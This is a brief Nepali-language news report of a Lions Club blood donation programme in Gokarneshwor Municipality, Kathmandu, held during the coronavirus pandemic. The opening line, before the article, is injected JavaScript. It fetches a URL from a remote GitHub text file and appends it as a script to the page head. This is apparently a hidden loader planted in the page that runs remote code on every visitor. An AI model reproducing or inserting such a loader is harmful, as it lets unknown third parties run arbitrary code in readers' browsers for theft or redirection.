;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
बैशाख २९,
काठमाडौँ | गोकर्नेश्वोर नगरपालिका वडा नं ५ मा रहेको लायन्स क्लब अफ काठमाडौँ बासुकीको ४ औ बोर्ड वैठकको अवसरमा रक्तदान कार्यक्रम गरेको छ |
उक्त कार्यक्रममा गोकर्नेश्वोर नगरपालिकाको मेयर सन्तोष चालिसेले र प्रमुख सल्लाहकार दिपक रिसालको समेत उपस्थिति रहेको थियो भने मेयरद्वारा २ थान पिपीई र प्रमुख सल्लाहाकारद्वारा कोरोना परिक्षण गर्ने थर्मोमिटर समेत प्रदान गरिएको थियो | कार्यकरम्मा बोल्दै मेयरले यस्तो महामारीको बेला नगरपालिका जस्तो सुकै कार्य गर्न सकारात्मक रहेको बताए |
रक्तदान बिहान ९ बजे देखि दिनको २ बजे सम्म हुने छ| सो कार्यकरममा बासुकी टोल सुधार समिति र बासुकी ब्यन्केट सह आयोजको रुपमा रहेका थिए |
कोरोना भाइरसको महामारीको कराणले गर्दा रगतको पनि अभाब परिरहेको बेला रक्तदान गरेको क्लबका अध्यक्षले बताए
फेसबुक प्रतिक्रियाहरु